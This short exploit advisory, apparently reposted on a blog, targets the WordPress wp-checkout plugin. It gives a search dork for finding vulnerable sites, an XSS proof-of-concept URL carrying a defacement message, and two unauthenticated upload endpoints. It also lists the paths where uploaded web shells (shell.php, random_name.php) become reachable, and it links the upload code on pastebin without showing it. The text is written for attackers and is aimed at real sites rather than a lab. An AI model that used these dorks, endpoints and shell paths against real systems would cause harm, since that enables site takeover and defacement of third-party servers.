#- Title : Wordpress Plugin wp-checkout XSS & Arbitrary File Upload
#- Author : DevilScreaM & Gastro-dz
#- Vendor : wordpress.org/extend/plugins/wordpress-checkout/
#- Date : 09/21/2015
#- Category : Web Applications
#- Type : PHP
#- Vulnerabillity : Arbitrary File Upload, XSS
#- Dork : inurl:wp-content/plugins/wp-checkout
#- Tested on : Vivid Vervet,Windows 7,Backbox
POC
XSS (CROSS SITE SCRIPTING) Discover by DevilScreaM
http://kmlhxr.id/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[Hacked BY kemalid aka HXIMPERATOR]
Arbitrary File Upload :
Exploit : http://localhost/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php ( Discover by DevilScreaM)
CODE IN HERE : http://pastebin.com/mKkVaRjA
Shell Access : "/wp-content/uploads/wp-checkout/shell.php"
Uploadify :
Exploit : http://kmlhxr/wp-content/uploads/wp-checkout/uploadify/upload.php
CODE IN HERE : http://pastebin.com/tRuTHr7B
Shell Access : /wp-content/uploads/wp-checkout/uploadify/random_name.php
Bagikan
Wordpress Plugin Wp-checkout Multiple Vulnerability
4/
5
Oleh
Rijal Imnida